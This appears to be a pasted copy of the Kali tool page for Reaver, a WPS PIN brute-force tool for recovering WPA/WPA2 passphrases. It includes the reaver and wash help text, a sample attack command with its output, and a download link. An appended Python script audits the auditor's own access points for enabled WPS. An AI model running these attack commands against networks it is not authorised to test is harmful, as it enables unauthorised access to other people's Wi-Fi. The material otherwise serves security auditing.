TVT618

[Linux] Reaver - Brute-force attack against Wifi Protected Setup (WPS)

Mar 22nd, 2018
Reaver Package Description
Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases, as described in http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf.

Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.

On average Reaver will recover the target AP’s plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.

Source: https://code.google.com/p/reaver-wps/
Kali Reaver Repo: http://git.kali.org/gitweb/?p=packages/reaver.git;a=summary
Author: Tactical Network Solutions, Craig Heffner, https://www.tacnetsol.com/
License: GPLv2

Tools included in the reaver package
reaver – WiFi Protected Setup Attack Tool
root@GithackTools618:~# reaver -h

Reaver v1.6.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

Required Arguments:
    -i, --interface=<wlan>          Name of the monitor-mode interface to use
    -b, --bssid=<mac>               BSSID of the target AP

Optional Arguments:
    -m, --mac=<mac>                 MAC of the host system
    -e, --essid=<ssid>              ESSID of the target AP
    -c, --channel=<channel>         Set the 802.11 channel for the interface (implies -f)
    -o, --out-file=<file>           Send output to a log file [stdout]
    -s, --session=<file>            Restore a previous session file
    -C, --exec=<command>            Execute the supplied command upon successful pin recovery
    -D, --daemonize                 Daemonize reaver
    -f, --fixed                     Disable channel hopping
    -5, --5ghz                      Use 5GHz 802.11 channels
    -v, --verbose                   Display non-critical warnings (-vv or -vvv for more)
    -q, --quiet                     Only display critical messages
    -h, --help                      Show help

Advanced Options:
    -p, --pin=<wps pin>             Use the specified pin (may be arbitrary string or 4/8 digit WPS pin)
    -d, --delay=<seconds>           Set the delay between pin attempts [1]
    -l, --lock-delay=<seconds>      Set the time to wait if the AP locks WPS pin attempts [60]
    -g, --max-attempts=<num>        Quit after num pin attempts
    -x, --fail-wait=<seconds>       Set the time to sleep after 10 unexpected failures [0]
    -r, --recurring-delay=<x:y>     Sleep for y seconds every x pin attempts
    -t, --timeout=<seconds>         Set the receive timeout period [10]
    -T, --m57-timeout=<seconds>     Set the M5/M7 timeout period [0.40]
    -A, --no-associate              Do not associate with the AP (association must be done by another application)
    -N, --no-nacks                  Do not send NACK messages when out of order packets are received
    -S, --dh-small                  Use small DH keys to improve crack speed
    -L, --ignore-locks              Ignore locked state reported by the target AP
    -E, --eap-terminate             Terminate each WPS session with an EAP FAIL packet
    -J, --timeout-is-nack           Treat timeout as NACK (DIR-300/320)
    -w, --win7                      Mimic a Windows 7 registrar [False]
    -K, --pixie-dust                Run pixiedust attack
    -Z                              Run pixiedust attack

Example:
    reaver -i wlan0mon -b 00:90:4C:C1:AC:21 -vv

wash – WiFi Protected Setup Scan Tool
root@GithackTools618:~# wash -h

Wash v1.6.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

Required Arguments:
    -i, --interface=<iface>               Interface to capture packets on
    -f, --file [FILE1 FILE2 FILE3 ...]    Read packets from capture files

Optional Arguments:
    -c, --channel=<num>                   Channel to listen on [auto]
    -o, --out-file=<file>                 Write data to file
    -n, --probes=<num>                    Maximum number of probes to send to each AP in scan mode [15]
    -D, --daemonize                       Daemonize wash
    -5, --5ghz                            Use 5GHz 802.11 channels
    -s, --scan                            Use scan mode
    -u, --survey                          Use survey mode [default]
    -a, --all                             Show all APs, even those without WPS
    -j, --json                            print extended WPS info as json
    -h, --help                            Show help

Example:
    wash -i wlan0mon

wash Usage Example
Scan for networks using the monitor mode interface (-i mon0) on channel 6 (-c 6), while ignoring frame checksum errors (-C):
root@kali:~# wash -i mon0 -c 6 -C

Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------------------------------
E0:3F:49:6A:57:78       6            -73        1.0               No                ASUS

reaver Usage Example
Use the monitor mode interface (-i mon0) to attack the access point (-b E0:3F:49:6A:57:78), displaying verbose output (-v):
root@kali:~# reaver -i mon0 -b E0:3F:49:6A:57:78 -v

Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from E0:3F:49:6A:57:78
[+] Associated with E0:3F:49:6A:57:78 (ESSID: ASUS)
[+] Trying pin 12345670

Download reaver: https://code.google.com/p/reaver-wps/
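
An audit-side use of the wash survey table from the wash usage example above, as an added example that is not part of the original paste or of the reaver project: it parses the v1.4 column layout shown there and reports which access points from your own inventory still advertise WPS. The inventory list, the function names and every sample row except the ASUS row are constructed for illustration, and the listing is assumed to contain only WPS-enabled APs, as in the output above.

```python
import re

# Constructed sample in the wash v1.4 column layout; only the ASUS row is from the page.
SAMPLE_WASH_OUTPUT = """\
BSSID                  Channel       RSSI       WPS Version       WPS Locked        ESSID
---------------------------------------------------------------------------------------
E0:3F:49:6A:57:78       6            -73        1.0               No                ASUS
02:00:00:AA:BB:01      11            -60        1.0               Yes               Lab Guest WiFi
02:00:00:AA:BB:02       1            -81        1.0               No                Neighbour
"""
# Hypothetical inventory of access points the auditor is responsible for.
OWNED_BSSIDS = ["e0:3f:49:6a:57:78", "02:00:00:AA:BB:01"]
BSSID_RE = re.compile(r"^(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$")


def parse_wash_table(text):
    """Parse wash survey rows into dicts; banner, header and rule lines are skipped."""
    rows = []
    for line in text.splitlines():
        # ESSID is the last column and may contain spaces, so split at most 5 times.
        parts = line.split(None, 5)
        if len(parts) < 5 or not BSSID_RE.match(parts[0]):
            continue
        rows.append({
            "bssid": parts[0].upper(),
            "channel": int(parts[1]),
            "rssi": int(parts[2]),
            "wps_version": parts[3],
            "wps_locked": parts[4].lower() == "yes",
            "essid": parts[5].strip() if len(parts) > 5 else "",  # hidden SSID
        })
    return rows


def audit_owned_aps(text, owned_bssids):
    """Return (bssid, essid, severity) for managed APs that still advertise WPS."""
    owned = {b.upper() for b in owned_bssids}
    findings = []
    for ap in parse_wash_table(text):
        if ap["bssid"] not in owned:
            continue  # out of scope: not our equipment
        # Locked means the AP is currently refusing PIN attempts; WPS is still enabled.
        severity = "medium" if ap["wps_locked"] else "high"
        findings.append((ap["bssid"], ap["essid"], severity))
    return findings


if __name__ == "__main__":
    for bssid, essid, sev in audit_owned_aps(SAMPLE_WASH_OUTPUT, OWNED_BSSIDS):
        print(f"{sev:6} {bssid} {essid!r}: WPS PIN enabled, disable it in the AP config")
```
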